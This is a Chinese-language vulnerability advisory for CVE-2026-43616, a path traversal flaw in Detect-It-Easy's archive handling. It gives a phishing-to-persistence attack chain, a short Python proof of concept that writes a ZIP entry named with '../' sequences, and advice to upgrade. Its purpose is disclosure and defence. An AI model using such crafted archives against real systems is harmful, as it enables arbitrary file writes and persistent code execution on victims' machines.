CVE-2026-43616 CVSS 7.1 高危

CVE-2026-43616 Detect-It-Easy路径遍历漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43616

漏洞类型

路径遍历

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Detect-It-Easy

漏洞概述

Detect-It-Easy在3.21版本之前存在严重的路径遍历漏洞。由于软件在处理归档文件时未能正确规范化路径，攻击者可以构造包含恶意相对遍历序列（如../）或绝对路径的特制归档文件。当受害者使用受影响的软件打开或扫描此类文件时，攻击者可利用该漏洞将任意文件写入到预期目录之外的文件系统中。这可能导致覆盖用户启动脚本，从而实现持久化的代码执行，对系统的完整性和可用性造成严重影响。

技术细节

该漏洞的核心机制在于Detect-It-Easy在解压归档文件（如ZIP等格式）时，缺乏对文件名中路径穿越字符的严格校验和清洗。正常情况下，解压程序应将文件限制在特定的沙箱或目标目录内。然而，受影响版本直接使用归档内提供的文件名进行写入操作。攻击者可以利用“../”序列回溯目录层级，或者使用绝对路径直接定位敏感位置。利用此漏洞，攻击者可以将恶意DLL、可执行文件或脚本写入Windows启动文件夹、系统目录或覆盖现有的配置文件。结合覆盖用户启动脚本的技术，攻击者能够在用户下次登录或系统重启时获得代码执行权限，从而建立持久化后门。此过程需要一定的用户交互（即诱导用户打开恶意文件），但无需预先的认证权限。

攻击链分析

STEP 1

1. 武器化

攻击者创建一个特制的归档文件（如ZIP），其中包含带有路径遍历序列（例如 ../../Windows/System32/）的文件条目，文件内容为恶意载荷或脚本。

STEP 2

2. 投递

攻击者通过钓鱼邮件、恶意下载链接或其他社交工程手段，将恶意归档文件发送给目标用户。

STEP 3

3. 利用

目标用户使用存在漏洞的Detect-It-Easy（< 3.21）打开或扫描该文件。软件在解析归档时，未能过滤路径字符，将恶意文件写入到系统敏感目录（如启动文件夹）。

STEP 4

4. 安装

通过覆盖启动脚本或写入恶意可执行文件，攻击者在目标系统上建立了持久化的驻留机制。

STEP 5

5. 执行

当用户重启系统或登录时，被写入的恶意脚本/程序自动运行，导致代码执行，攻击者获得系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import os

# Create a malicious zip file demonstrating the path traversal
# This PoC creates a zip file that attempts to write a file outside the extraction directory

def create_malicious_zip(filename):
    with zipfile.ZipFile(filename, 'w') as zf:
        # The file name contains '../' to traverse out of the intended directory
        # In a real attack, this might point to a startup folder or system directory
        malicious_filename = "../../../../../tmp/poc_exploit.txt"
        
        # Write content to the file entry
        zf.writestr(malicious_filename, "This file was written via Path Traversal vulnerability in CVE-2026-43616.")
    
    print(f"Created malicious archive: {filename}")
    print(f"It contains a file entry named: {malicious_filename}")

if __name__ == "__main__":
    create_malicious_zip("cve_2026_43616_poc.zip")

影响范围

Detect-It-Easy < 3.21

防御指南

临时缓解措施

建议用户立即检查当前使用的Detect-It-Easy版本，并尽快通过官方渠道更新至3.21或更高版本以修复此路径遍历漏洞。在完成升级之前，请勿使用该软件处理来自不可信来源的文件，特别是压缩包。同时，应检查系统中是否存在异常的新增文件或被修改的启动项。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表